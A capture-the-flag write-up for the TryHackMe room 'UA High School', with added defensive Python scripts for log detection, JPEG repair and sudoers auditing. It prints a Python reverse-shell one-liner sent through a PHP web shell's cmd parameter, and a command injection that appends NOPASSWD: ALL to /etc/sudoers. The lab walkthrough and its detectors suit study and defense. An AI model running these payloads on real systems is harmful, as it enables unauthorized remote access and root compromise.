
# UA High School - A TryHackMe Writeup

[UA High School](https://tryhackme.com/r/room/yueiua) created by [Fede1781](https://tryhackme.com/p/Fede1781)

Start the machine and let it fully boot.

When we run nmap we see that only ports 22 and 80 are open.

<figure><img src="/files/4FG1E6Bm1FXRqex8KBff" alt=""><figcaption></figcaption></figure>

Since port 80 is open and served by Apache, there is most likely a website hosted. Browsing to the IP gives us this page:

<figure><img src="/files/kshPu1MuqIwcewJAAjRS" alt=""><figcaption></figcaption></figure>

By viewing the page source we can see that the CSS sheet is stored in the /assets folder. If we run gobuster against the main / and also against the /assets folder (with -x php,html so it also looks for files with those extensions) we discover that there is a PHP file in there.

<figure><img src="/files/iWf6NxKLGW26j9KqGXEM" alt=""><figcaption></figcaption></figure>

The PHP file does not load anything, but I wonder if we can exploit it somehow.

By appending ?cmd=ls to the request we get some sort of output:

<figure><img src="/files/tPDk7XT7rttB1KGrQVp2" alt=""><figcaption></figcaption></figure>

Base64-decoding it shows that this is the directory listing of the assets folder.

<figure><img src="/files/OsPsKZi6b8xYaLTw07TL" alt=""><figcaption></figcaption></figure>

So it does look like we have some sort of access using the LFI exploit. Now we can navigate around and find a user, as well as the user.txt file. However, we do not have permission to view it because we are still the www-data user. We have to find another way to gain access.
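From the defensive side, the request pattern used above (a PHP file under /assets executing whatever arrives in a `cmd` parameter) is easy to spot in the web server's access log. The following script is an added example, not part of this writeup or the room; it parses Apache combined-format log lines, decodes each command passed through such a parameter, and marks the ones that carry reverse-shell indicators. The file name `example.php`, the sample log lines and the list of parameter names other than `cmd` are constructed assumptions.

```python
"""Flag command-injection style requests in an Apache access log.

Added example, not code from the writeup or the room. The room's web shell
took its command from a ?cmd= parameter on a PHP file under /assets; this
scans combined-format log lines for that pattern and decodes each command.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines. "example.php" is a placeholder: the writeup
# does not name the PHP file it found under /assets.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET / HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /assets/style.css HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /assets/example.php HTTP/1.1" 200 0 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /assets/example.php?cmd=ls HTTP/1.1" 200 64 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /assets/example.php?cmd=python3%20-c%20%27import%20socket%27 HTTP/1.1" 200 0 "-" "curl/8.0"
"""

# Parameter names treated as a command sink. "cmd" is the one the room used;
# the others are common variants added here as an assumption.
COMMAND_PARAMS = ("cmd", "command", "exec", "c")

# Substrings inside a decoded command that suggest a reverse shell or download
# cradle rather than a simple directory listing.
REVSHELL_TOKENS = ("python", "socket", "/dev/tcp", "bash -i", "nc ", "curl", "wget", "pty")

# Apache combined log format up to the status code; referer and user agent
# are not needed for this check.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_cmd_requests(log_text):
    """Return one dict per request that passes a command through a PHP file."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith(".php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for name in COMMAND_PARAMS:
            if name not in params:
                continue
            cmd = params[name][0]  # parse_qs has already percent-decoded it
            lowered = cmd.lower()
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": url.path,
                "param": name,
                "cmd": cmd,
                "status": int(m.group("status")),
                "indicators": [t for t in REVSHELL_TOKENS if t in lowered],
            })
    return hits


def worst_hits(hits):
    """Only the hits whose command carries a reverse-shell indicator."""
    return [h for h in hits if h["indicators"]]


if __name__ == "__main__":
    for h in find_cmd_requests(SAMPLE_LOG):
        flag = "REVSHELL?" if h["indicators"] else "cmd"
        print(f"{h['time']} {h['ip']} {flag:10} {h['path']} {h['param']}={h['cmd']!r}")
```

Run it against a real `access.log` by replacing `SAMPLE_LOG` with the file contents; a plain `ls` is reported as a command request, while the Python one-liner is additionally marked with its reverse-shell indicators, which is the event worth alerting on.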

We can get a reverse shell through Python by going to revshells.com and selecting Python3#2. Make sure the IP and port are correct, start a netcat listener on your machine (nc -lvnp 4444), and then paste this code as the value of the ?cmd= parameter of the PHP file:

```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP-ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
```

<figure><img src="/files/1QipOzmt8x4KDCJsm4iU" alt=""><figcaption></figcaption></figure>

Once you hit enter, your nc listener should automatically receive the connection from the device.

<figure><img src="/files/hednVjA2cer9ksrNAiq7" alt=""><figcaption></figcaption></figure>

We are still www-data user though so we're not able to view user.txt.

We can poke around the system and find the user deku, but we also find a Hidden-Content folder as well as a oneforall.jpg file in the assets/images folder. The Hidden-Content folder gives us a passphrase file, but this password isn't successful when trying to SSH in as the deku user. Back to the oneforall.jpg. When running file on it, we see it shows as a data file, not a JPG file. This tells us that something was altered in it. I downloaded the file to my local machine and edited the magic numbers to the correct JPG values using hexeditor.

<figure><img src="/files/K9Uid7LdF7MdhUIg87Id" alt=""><figcaption></figcaption></figure>

Now when running file on it, it shows as a correct JPG file and we can actually open and view the picture.

<figure><img src="/files/MKLEjV8WKla7j7WdZUvh" alt=""><figcaption></figcaption></figure>
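The hexeditor step above can be done in code as well. The following script is an added example, not the room's own tooling or anything from this writeup: it mimics the `file` check with a small magic-byte table, deduces from the `JFIF`/`Exif` identifier at offset 6 which APP marker belongs after the SOI marker, and restores the first four bytes. The sample byte strings are constructed; the assumption that exactly the first four bytes were overwritten is this example's, not a statement about the room's file.

```python
"""Identify and repair a JPEG whose leading magic bytes were overwritten.

Added example, not the room's tooling. It performs in code what the writeup
does by hand in hexeditor: restore the SOI marker (FF D8) and the APP0/APP1
marker so `file` recognises the image again.
"""
JPEG_SOI = b"\xff\xd8"

# Magic bytes for a few formats, used for a minimal `file`-style check.
KNOWN_MAGICS = {
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def identify(data):
    """Return the format name whose magic matches, or "data" like `file` does."""
    for name, magic in KNOWN_MAGICS.items():
        if data.startswith(magic):
            return name
    return "data"


def app_marker_for(data):
    """Deduce the first APP marker from the segment identifier at offset 6.

    A well-formed JPEG starts: FF D8 | FF E0 | <len:2> | "JFIF\\0" (or
    FF E1 | <len:2> | "Exif\\0\\0" for Exif files). The identifier survives
    a clobbered header, so it tells us which marker to put back.
    """
    ident = data[6:10]
    if ident == b"JFIF":
        return b"\xff\xe0"
    if ident == b"Exif":
        return b"\xff\xe1"
    return None


def looks_like_damaged_jpeg(data):
    """Header does not match, but the segment identifier and EOI marker are intact."""
    return (identify(data) != "jpeg"
            and app_marker_for(data) is not None
            and data.endswith(b"\xff\xd9"))


def repair_jpeg_header(data):
    """Return a copy with the first four bytes restored; unchanged if already a JPEG."""
    if identify(data) == "jpeg":
        return data
    marker = app_marker_for(data)
    if marker is None:
        raise ValueError("no JFIF/Exif identifier at offset 6; not a JPEG body")
    return JPEG_SOI + marker + data[4:]


def repair_file(src, dst):
    """Read src, repair the header, write dst; returns the format detected afterwards."""
    with open(src, "rb") as f:
        fixed = repair_jpeg_header(f.read())
    with open(dst, "wb") as f:
        f.write(fixed)
    return identify(fixed)


# Constructed sample: a tiny JFIF header, a stand-in body and the EOI marker.
GOOD_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             + b"<scan data>" + b"\xff\xd9")
# Same bytes with the first four overwritten: a constructed instance of the
# kind of damage the writeup describes, assumed here for illustration.
DAMAGED_JPEG = b"\x00\x00\x00\x00" + GOOD_JPEG[4:]

if __name__ == "__main__":
    print("before:", identify(DAMAGED_JPEG))
    print("after: ", identify(repair_jpeg_header(DAMAGED_JPEG)))
```

`repair_file("oneforall.jpg", "oneforall.fixed.jpg")` is the on-disk form of the hexeditor edit; it refuses files that carry neither identifier at offset 6, so it will not blindly stamp a JPEG header onto something that was never a JPEG.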

Viewing the picture doesn't give us anything, but we still have that passphrase, so let's see if there is anything hidden in it with steghide.

<figure><img src="/files/2TAIFZ5Ncl0Qlcqh5PQt" alt=""><figcaption></figcaption></figure>

It now gives us a creds.txt file, which has the user:pass to SSH in as deku. Now that we are in as deku, we can view the user.txt file.

Now if we run sudo -l as deku, we can see that any user can run a feedback.sh script with sudo.

<figure><img src="/files/2ZsaI51kMu2eSYwFYXVg" alt=""><figcaption></figcaption></figure>

After running the feedback form a few times I tried to see if we could run a command to add deku to the sudoers file.

```
deku ALL =NOPASSWD: ALL >> /etc/sudoers
```

After running this and checking sudo -l again, we see that the entry was added successfully. If we run sudo /bin/bash we now have root access and can navigate to the root folder to view the root.txt file.
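The two sudo findings in this room, a script every user may run as root and the `NOPASSWD: ALL` line that ends up in /etc/sudoers, are exactly what a sudoers audit should surface. The script below is an added example, not part of this writeup or the room: it parses user-spec lines from a sudoers file, separates the tags from the command list, and rates each rule. The sample file and the path `/opt/scripts/feedback.sh` are constructed; the writeup names only the script's file name.

```python
"""Audit a sudoers file for rules that hand out root too freely.

Added example, not the room's own tooling. Two findings from the writeup
matter here: a script any user may run with sudo (the feedback.sh rule) and
a NOPASSWD: ALL line that grants an unrestricted root shell.
"""
import re

# Constructed sample; the path of feedback.sh is hypothetical, the writeup
# gives only the file name.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# every user may run the feedback script as root, without a password
ALL     ALL=NOPASSWD: /opt/scripts/feedback.sh
deku    ALL=NOPASSWD: ALL
"""

_RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$"
)
_TAG_RE = re.compile(
    r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC|"
    r"LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*"
)
_SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def parse_rules(text):
    """Parse user-spec lines; Defaults, alias definitions and comments are skipped.

    Tags are read once at the start of the command list, which covers the
    common layout. Per-command tags after a comma stay inside the command text.
    """
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(_SKIP_PREFIXES):
            continue
        m = _RULE_RE.match(line)
        if not m:
            continue
        spec, tags = m.group("spec").strip(), []
        while (t := _TAG_RE.match(spec)):
            tags.append(t.group(1))
            spec = spec[t.end():]
        rules.append({
            "line": lineno,
            "user": m.group("user"),
            "host": m.group("host"),
            "runas": m.group("runas") or "root",   # sudo's default target user
            "tags": tags,
            "commands": [c.strip() for c in spec.split(",") if c.strip()],
        })
    return rules


def audit_sudoers(text):
    """Return the risky rules, each with a severity and the reason it was flagged."""
    findings = []
    for rule in parse_rules(text):
        nopass = "NOPASSWD" in rule["tags"]
        anyone = rule["user"] == "ALL"
        all_cmds = "ALL" in rule["commands"]
        if all_cmds and (nopass or anyone):
            severity = "critical"
            reason = ("unrestricted command set"
                      + (" without a password" if nopass else "")
                      + (" for every user" if anyone else ""))
        elif anyone:
            severity = "high"
            reason = "every local user may run this as %s; review the target's input handling" % rule["runas"]
        elif nopass:
            severity = "medium"
            reason = "runs without a password; review the target's input handling"
        else:
            continue
        findings.append({**rule, "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {f['line']}: [{f['severity']}] {f['user']} -> {', '.join(f['commands'])}: {f['reason']}")
```

On the sample, the feedback.sh rule is rated high because the user field is `ALL`, which is the misconfiguration that let a low-privileged account reach the script at all; the `deku ALL=NOPASSWD: ALL` line is rated critical. Monitoring /etc/sudoers and /etc/sudoers.d for writes (with auditd or a file-integrity tool) catches the moment such a line is appended, which is the escalation step this writeup ends on.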


